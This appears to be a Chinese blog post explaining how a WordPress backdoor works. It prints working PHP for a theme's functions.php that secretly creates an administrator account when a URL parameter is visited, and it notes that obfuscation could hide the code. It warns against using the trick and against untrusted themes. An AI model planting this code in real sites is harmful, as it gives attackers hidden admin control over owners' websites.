首页 » 建站技术 » WordPress » 浏览内容

如何在 WordPress 站点创建后门


2013-08-03 22:18:10 1,234 0 发表评论 字体: 作者:C.K.

体验版 88 元,个人版 128 元,多用户版 288元个人版160元升级到多用户版。

本文来自:http://blog.wpjam.com/m/how-to-create-a-backdoor-to-a-wordpress-website/

是不是在很多场合听说过后门(Backdoor),特别是一些高科技的电影里面,那些系统或者程序的作者都会通过自己留下的后门来拯救世界 🙂 。其实程序的后门留我们根本不远,其实你用的很多软件或者程序都是有后门的,下面给大家演示的一个很简单的案例,就可以给 WordPress 站点留下后门,获取管理员权限,当然这只是一篇教学文章,个人强烈你在使用 WordPress 帮人作网站的时候,千万不要这样做。

<?php
  • add_action( 'wp_head', 'my_backdoor' );
  •  
  • function my_backdoor() {
  •     if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) {
  •         require( 'wp-includes/registration.php' );
  •         if ( !username_exists( 'backdoor' ) ) {
  •             $user_id = wp_create_user( 'backdoor', 'pa55w0rd!' );
  •             $user = new WP_User( $user_id );
  •             $user->set_role( 'administrator' );
  •         }
  •     }
  • }
  • 比如在主题的 functions.php 文件中添加以上代码,就可以给 WordPress 添加一个能够创建管理员的后门,只需访问 http://www.yoursitename.com/?backdoor=go,然后就创建了一个用户名为“backdoor”,密码为:“pa55w0rd!” 的管理员。

    如果在把上面这段代码加密一下,很多用户就根本不知道这段代码是做什么的,所以强烈建议大家不要随便去下载一些来路不明的 WordPress 主题和插件,说不定就给你的站点安装了一个后门。 🙂

      网站统计 Statistics

      • 创建时间: 2005年1月3日 距今4764 天
      • 日志总数: 2461
      • 评论总数: 630
      • 标签总数: 654
      • 链接总数: 273
      • 最后更新: 2017-7-1 18:16:33
      • 您是本站第 13200175 位访客

      广告区 Guǎng Gào